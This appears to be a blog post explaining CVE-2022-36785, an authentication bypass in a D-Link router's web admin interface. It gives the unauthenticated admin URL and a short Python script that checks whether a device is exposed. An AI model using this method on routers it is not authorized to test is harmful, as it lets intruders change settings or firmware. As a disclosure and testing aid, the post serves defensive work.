In late 2022, a serious security problem was discovered in D-Link’s "G Integrated Access Device4" routers. Identified as CVE-2022-36785, this vulnerability lets attackers bypass login controls and access admin information without authentication. This post will show you, in simple terms, how the exploit works, why it’s dangerous, and provide sample code and reference links.
What is CVE-2022-36785?
This is a vulnerability in D-Link’s web interface for certain router models. There are two main issues:
Where’s the Problem?
The router’s web interface uses files like login.asp and setupWizard.asp.
setupWizard.asp is a page meant for setup wizards and admin config.
Multiple issues let attackers get around login requirements entirely!
Open up the login.asp file in a browser. Look around line 15. The code looks like this
window.location.href = "http://192.168.1.1/setupWizard.asp";;
This means if anything redirects you (the user) to the router, you go straight to setupWizard.asp—whether or not you logged in. That’s already a hint something’s wrong; the redirect is on the client side, not enforced by the server!
Also:
The HTML form reveals the default admin username.
<input type="text" name="username" value="admin">
Anyone looking at the source code can see "admin" right there as the username.
Authorization Bypass
The real problem is deeper. Normally, websites use session tokens or cookies to check if a user is logged in (“login_flag” or “login_status”). Here, checks are missing!
Scenario:
If you request the URL:
http://192.168.1.1/setupWizard.asp
without logging in, the router is supposed to block you.
- In reality, the router’s code relies on client-side variables for access checks (bad practice!).
Sample vulnerable logic
// Incomplete pseudo-code found in JS
if (login_flag == "1") {
// show admin page
} else {
// redirect to login
}
But a look at the real HTTP response shows _NO_ actual check—for example, via cookies or server session—whether you’re authenticated.
Go to
http://192.168.1.1/setupWizard.asp
No login needed. You are in the admin setup wizard.
The web interface does not check the backend for authentication status. Also, critical variables (like login_flag and login_status) are controlled/lost on the CLIENT SIDE, so you can just bypass them (e.g., using browser console).
`
http://192.168.1.1/setupWizard.asp
If you want to automate this for pen-testing, here’s a simple Python example using requests
import requests
router_url = "http://192.168.1.1/setupWizard.asp";
r = requests.get(router_url)
if "Admin Setup Wizard" in r.text:
print("Vulnerable! Accessed admin setup without login.")
else:
print("No access or issue patched.")
You can edit the "Admin Setup Wizard" marker depending on the real title.
Impact
- Anyone on your WiFi/network can access the admin setup wizard.
They can change your WiFi password, firmware, or even brick your router.
- No username/password needed—the default username is "admin" and is just for show.
Original References & Further Reading
- NVD: CVE-2022-36785 Details
- Full Disclosure Mail Archive – Initial Report
- SecurityFocus BID 71126
- D-Link Security Advisory
Summary Table
| Issue | Impact | Exploitability |
|---------------------|---------------------------|----------------|
| Info Disclosure | Reveals admin username | Easy |
| Auth Bypass | Full admin access w/o login | Trivial |
Final Note
CVE-2022-36785 is an example of how client-side security and lax code allows attackers to bypass web admin controls with almost no skill. Don’t expose your router’s admin panel, always patch, and keep an eye on security advisories!
Timeline
Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 17:09:00 UTC